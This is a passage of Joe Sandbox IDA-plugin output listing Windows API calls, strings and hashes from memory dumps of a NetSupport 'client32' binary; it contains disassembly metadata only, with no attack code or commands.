                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: InitializeUninitialize
                                                                                                                                                                                                    • String ID: HID$PS/2$USB$Win32_PointingDevice
                                                                                                                                                                                                    • API String ID: 3442037557-1320232752
                                                                                                                                                                                                    • Opcode ID: 945b61195795daed44a5419f1403211bb583dbcc7a60dd783a52273aacfb2d47
                                                                                                                                                                                                    • Instruction ID: 4ae991e8b238cca573096b2fcc20bd372ce19027575c055cb203384996eb618e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 945b61195795daed44a5419f1403211bb583dbcc7a60dd783a52273aacfb2d47
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7E316D75A0062B9FDB21CF94CC41BEAB7B4EF09315F0044F5E919AB244EB74EA85CB91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetDlgItem.USER32(00000008,?), ref: 1107D876
                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000015), ref: 1107D8AA
                                                                                                                                                                                                      • Part of subcall function 110772A0: GetDlgItem.USER32(?,?), ref: 110772DB
                                                                                                                                                                                                      • Part of subcall function 110772A0: IsWindowVisible.USER32(00000000), ref: 110772F7
                                                                                                                                                                                                      • Part of subcall function 110772A0: ShowWindow.USER32(00000000,00000000), ref: 11077317
                                                                                                                                                                                                    • InvalidateRect.USER32(00000000,00000000,00000000), ref: 1107D92C
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • m_hWnd, xrefs: 1107D917
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1107D912
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$Item$InvalidateRectShowVisible
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 3890985837-2830328467
                                                                                                                                                                                                    • Opcode ID: cb7a73266c2e43f887cb54da0e730aa52047e3cb9c3499e81ef2b8ed5b8fb976
                                                                                                                                                                                                    • Instruction ID: ac581610526f9a969a1a3a3b50c1caa9765caa2c3588efba05e4f1fef3c58298
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cb7a73266c2e43f887cb54da0e730aa52047e3cb9c3499e81ef2b8ed5b8fb976
                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED5119B5E00705AFD710CF58C881F6EBBF4FB48314F208559EA6A9B291D770E840CB94
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,00000000,1106AF10,?,?,?,?,?), ref: 1106D1C2
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1106D299
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 1106D2BF
                                                                                                                                                                                                      • Part of subcall function 1110C8A0: EnterCriticalSection.KERNEL32(?,BBC4A55B,?,?,?,?,?,?), ref: 1110C8D4
                                                                                                                                                                                                      • Part of subcall function 1110C8A0: LeaveCriticalSection.KERNEL32(?,?,?), ref: 1110C911
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$Leave$EnterEventwsprintf
                                                                                                                                                                                                    • String ID: ..\ctl32\Connect.cpp$erased=%d, idata->dead=%d
                                                                                                                                                                                                    • API String ID: 3430577181-2624497655
                                                                                                                                                                                                    • Opcode ID: 7e669e9a5a4f37c27c7146ff50ba6d66a74f2ada1778d74f9747df45e64f0b3c
                                                                                                                                                                                                    • Instruction ID: 04573714079795333ec223b70536839c78a5a0195139b0015b045f9e3d8978cb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e669e9a5a4f37c27c7146ff50ba6d66a74f2ada1778d74f9747df45e64f0b3c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD318975E00296EFDB25CF50C880F9EB3B8AB45318F0085DAE54A6B241DB70EAC5CB61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110C8A0: EnterCriticalSection.KERNEL32(?,BBC4A55B,?,?,?,?,?,?), ref: 1110C8D4
                                                                                                                                                                                                      • Part of subcall function 1110C8A0: LeaveCriticalSection.KERNEL32(?,?,?), ref: 1110C911
                                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,00000000,1106AF10,?,?,?,?,?), ref: 1106D1C2
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1106D299
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 1106D2BF
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$Leave$EnterEventwsprintf
                                                                                                                                                                                                    • String ID: ..\ctl32\Connect.cpp$erased=%d, idata->dead=%d
                                                                                                                                                                                                    • API String ID: 3430577181-2624497655
                                                                                                                                                                                                    • Opcode ID: acfe9df1836c1e9302e8be9c47d6b3a855bab0fd3b4b46642e96841f146edea2
                                                                                                                                                                                                    • Instruction ID: 536c81e74eca5bf7a4e2791cfcdf9f566333e3a1added10bfa629768b284d793
                                                                                                                                                                                                    • Opcode Fuzzy Hash: acfe9df1836c1e9302e8be9c47d6b3a855bab0fd3b4b46642e96841f146edea2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 21317A75E00296EFD725CF90C884F9EF7F9AB45314F00819AD54A9B241DB70E9C1CB61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000475), ref: 110CB5E0
                                                                                                                                                                                                    • GetWindowTextLengthA.USER32(00000000), ref: 110CB5E7
                                                                                                                                                                                                    • GetDlgItemTextA.USER32(?,00000475,00000000,00000001), ref: 110CB605
                                                                                                                                                                                                      • Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
                                                                                                                                                                                                      • Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • IsA(), xrefs: 110CB635
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 110CB630
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorItemLastText$ExitFreeHeapLengthMessageProcessWindowwsprintf
                                                                                                                                                                                                    • String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                                                                                                                    • API String ID: 190121423-3415836059
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(111E97E4), ref: 110774E5
                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 11077509
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 11077530
                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 11077557
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DeleteObject$DecrementErrorExitInterlockedLastMessageProcesswsprintf
                                                                                                                                                                                                    • String ID: ..\ctl32\Coolbar.cpp
                                                                                                                                                                                                    • API String ID: 3588104766-3522349108
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadStringA.USER32(00000000,?,00000058,BBC4A55B), ref: 11141118
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1114112E
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LoadStringwsprintf
                                                                                                                                                                                                    • String ID: #%d$..\ctl32\util.cpp$i < cchBuf
                                                                                                                                                                                                    • API String ID: 104907563-3240211118
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 11087AB0: IsWindow.USER32(?), ref: 11087ACF
                                                                                                                                                                                                      • Part of subcall function 11087AB0: IsWindow.USER32(?), ref: 11087ADD
                                                                                                                                                                                                    • GetParent.USER32(00000000), ref: 1106719C
                                                                                                                                                                                                    • GetParent.USER32(00000000), ref: 110671A5
                                                                                                                                                                                                    • IsChild.USER32(00000000,00000000), ref: 110671B9
                                                                                                                                                                                                      • Part of subcall function 11087A50: IsWindow.USER32(110055D2), ref: 11087A6C
                                                                                                                                                                                                      • Part of subcall function 11087A50: IsWindow.USER32(?), ref: 11087A86
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$Parent$Child
                                                                                                                                                                                                    • String ID: FixEHParent$_debug
                                                                                                                                                                                                    • API String ID: 3381959328-498807111
                                                                                                                                                                                                    • Opcode ID: 4bddab196cb6adcd855e2140b2b419c3c761946d297c8f23d9730be6298a245d
                                                                                                                                                                                                    • Instruction ID: 19ed4bc464ac013ef3aede55ea0528bdf8a938b54301afc5030378f5434f72ea
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4bddab196cb6adcd855e2140b2b419c3c761946d297c8f23d9730be6298a245d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 33F09636E01925679F01A6AD4C84DAFFADE9DC555830140E7FE25EB100ED609E01C7A1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • IsWindow.USER32(?), ref: 110335F8
                                                                                                                                                                                                    • GetClassNameA.USER32(?,?,00000400), ref: 11033626
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ClassErrorExitLastMessageNameProcessWindowwsprintf
                                                                                                                                                                                                    • String ID: CltAutoLogon.cpp$ComboBox$IsWindow(hWin)
                                                                                                                                                                                                    • API String ID: 2713866921-163732079
                                                                                                                                                                                                    • Opcode ID: 3b9e86a5835d1674b9f04b13084563b7e6818a03ecb2fa4b648010b3b217809c
                                                                                                                                                                                                    • Instruction ID: 7c0026f42908b5e278ccc52ab84e836bf453825b517ccc9397fc8abb106b0303
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b9e86a5835d1674b9f04b13084563b7e6818a03ecb2fa4b648010b3b217809c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6AF0BB75E1162D6BDB00DB649D41FEEF76C9F05209F0000A4FF14A6141EA346A058BDA
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(cenctrl.dll), ref: 110852BE
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,cenctrl_protection), ref: 110852D0
                                                                                                                                                                                                      • Part of subcall function 11085260: FreeLibrary.KERNEL32(00000000,?,110852E4), ref: 1108526A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                    • String ID: EDC$cenctrl.dll$cenctrl_protection
                                                                                                                                                                                                    • API String ID: 145871493-3137230561
                                                                                                                                                                                                    • Opcode ID: bcefdbb54fd6e3826cd2e4b083ee9c304654a3391fecb8a6baff1735307a3122
                                                                                                                                                                                                    • Instruction ID: d397d68d13e32483cc8c89d25abb01868daaac96927e0e05309bf2cb32c419b9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bcefdbb54fd6e3826cd2e4b083ee9c304654a3391fecb8a6baff1735307a3122
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 42F02278E0832367EB01AF38BC0978E7AC85B0231CF410437F845EA20AFD22E04047A3
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FindWindowA.USER32(IPTip_Main_Window,00000000), ref: 11017058
                                                                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 11017067
                                                                                                                                                                                                    • PostMessageA.USER32(00000000,00000112,0000F060,00000000), ref: 11017088
                                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000112,0000F060,00000000), ref: 1101709B
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: MessageWindow$FindLongPostSend
                                                                                                                                                                                                    • String ID: IPTip_Main_Window
                                                                                                                                                                                                    • API String ID: 3445528842-293399287
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 11031494
                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 110314B0
                                                                                                                                                                                                    • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 110314D3
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 11031563
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 110315C4
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • API ID: File$CloseHandle$CreateReadSize
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3664964396-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateSolidBrush.GDI32(00000000), ref: 1107B0AC
                                                                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 1107B0E8
                                                                                                                                                                                                    • PatBlt.GDI32(?,00000001,00000001,?,?,00F00021), ref: 1107B114
                                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 1107B11F
                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 1107B127
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • API ID: Object$Select$BrushCreateDeleteSolid
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1979645813-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DecodePointer.KERNEL32(?,0000000F,00000000,?,?,1115F6C6,11019A91,111D6F60,0000000C,1115F6F2,11019A91,?,11019A91), ref: 1115F5D7
                                                                                                                                                                                                    • DecodePointer.KERNEL32(?,0000000F,00000000,?,?,1115F6C6,11019A91,111D6F60,0000000C,1115F6F2,11019A91,?,11019A91), ref: 1115F5E4
                                                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,?,0000000F,00000000,?,?,1115F6C6,11019A91,111D6F60,0000000C,1115F6F2,11019A91,?,11019A91), ref: 1115F649
                                                                                                                                                                                                    • EncodePointer.KERNEL32(11019A91,?,0000000F,00000000,?,?,1115F6C6,11019A91,111D6F60,0000000C,1115F6F2,11019A91,?,11019A91), ref: 1115F65D
                                                                                                                                                                                                    • EncodePointer.KERNEL32(-00000004,?,0000000F,00000000,?,?,1115F6C6,11019A91,111D6F60,0000000C,1115F6F2,11019A91,?,11019A91), ref: 1115F665
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • API ID: Pointer$Encode$Decode
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1898114064-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110250F7
                                                                                                                                                                                                    • GetDlgItem.USER32(?,00001399), ref: 11025131
                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 1102514A
                                                                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 11025154
                                                                                                                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11025196
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$DispatchItemTranslate
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1381171329-0
                                                                                                                                                                                                    • Opcode ID: 9bbe141cbcae0986ab8e1a5d19c673565b62793078cbe47edbac0050ed91c493
                                                                                                                                                                                                    • Instruction ID: 4970fc911a0e855f64a3d9e647d9240b716c91892a3758399f36bf61488b9f97
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9bbe141cbcae0986ab8e1a5d19c673565b62793078cbe47edbac0050ed91c493
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6421AE71E0030B6BEB21DA65CC85FAFB3FCAB44708F904469EA1792180FB75E401CB95
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11023387
                                                                                                                                                                                                    • GetDlgItem.USER32(?,00001399), ref: 110233C1
                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 110233DA
                                                                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 110233E4
                                                                                                                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11023426
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$DispatchItemTranslate
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1381171329-0
                                                                                                                                                                                                    • Opcode ID: 1eedb8004f846199553b9819b36fcc4fba7ec9623a11643e01901e57e73e0ceb
                                                                                                                                                                                                    • Instruction ID: 550a142869b4f1c1193fc2f7bd4fc6518863fc800a3782c30ff24b2ab7768c02
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1eedb8004f846199553b9819b36fcc4fba7ec9623a11643e01901e57e73e0ceb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0721A175E0430B6BD711DF65CC85BAFB3ACAB48308F808469EA5296280FF74F501CB91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1103F000: DeleteObject.GDI32(?), ref: 1103F0EB
                                                                                                                                                                                                    • CreateRectRgnIndirect.GDI32(?), ref: 1103F168
                                                                                                                                                                                                    • CombineRgn.GDI32(?,?,00000000,00000002), ref: 1103F17C
                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 1103F183
                                                                                                                                                                                                    • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 1103F1A6
                                                                                                                                                                                                    • CombineRgn.GDI32(00000000,00000000,00000000,00000002), ref: 1103F1BD
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CombineCreateDeleteObjectRect$Indirect
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3044651595-0
                                                                                                                                                                                                    • Opcode ID: 1250bfdb64eb9f94442feb870266ab3da7c928c1294f43dacfd40da9a11fa5ee
                                                                                                                                                                                                    • Instruction ID: 27b6d86d25d7e193214482d66684a995ae6d2575b2198652133f57a3d860c4fb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1250bfdb64eb9f94442feb870266ab3da7c928c1294f43dacfd40da9a11fa5ee
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 26116031A50702AFE721CE64D888B9AF7ECFB45716F00812EE66992180C770B881CB93
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 1100B2A0
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 1100B2D9
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 1100B2F8
                                                                                                                                                                                                      • Part of subcall function 1100A200: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 1100A21E
                                                                                                                                                                                                      • Part of subcall function 1100A200: DeviceIoControl.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 1100A248
                                                                                                                                                                                                      • Part of subcall function 1100A200: GetLastError.KERNEL32 ref: 1100A250
                                                                                                                                                                                                      • Part of subcall function 1100A200: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1100A264
                                                                                                                                                                                                      • Part of subcall function 1100A200: CloseHandle.KERNEL32(00000000), ref: 1100A26B
                                                                                                                                                                                                    • waveOutUnprepareHeader.WINMM(00000000,?,00000020), ref: 1100B308
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 1100B30F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$Enter$CloseControlCreateDecrementDeviceErrorEventHandleHeaderInterlockedLastLeaveObjectSingleUnprepareWaitwave
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3652779745-0
                                                                                                                                                                                                    • Opcode ID: 2ffaf857092779b4cc8c6dc948aa08485a8b39598cc2e1fcd4f28cf9cf4d7f7e
                                                                                                                                                                                                    • Instruction ID: ec5bb7023ba9694b1826725806baee6a54caa52fbc33dd5691a93a0cc33b1c6d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ffaf857092779b4cc8c6dc948aa08485a8b39598cc2e1fcd4f28cf9cf4d7f7e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C111C27A900B16ABE311CF60CC88BEFB7ECAF48358F004919FA2692141D370B540CB61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • PostMessageA.USER32(0001048A,00000501,00000000,00000000), ref: 11057461
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Warning. DoNotify(%d) not processed, xrefs: 1105835B
                                                                                                                                                                                                    • Unable to select/accept connection within 10sec, ignoring cmd %d, xrefs: 1105747B
                                                                                                                                                                                                    • Warning. Eval period expired - ignoring cmd %d (x%x) - idata %x - VistaUI %d, xrefs: 110574EA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
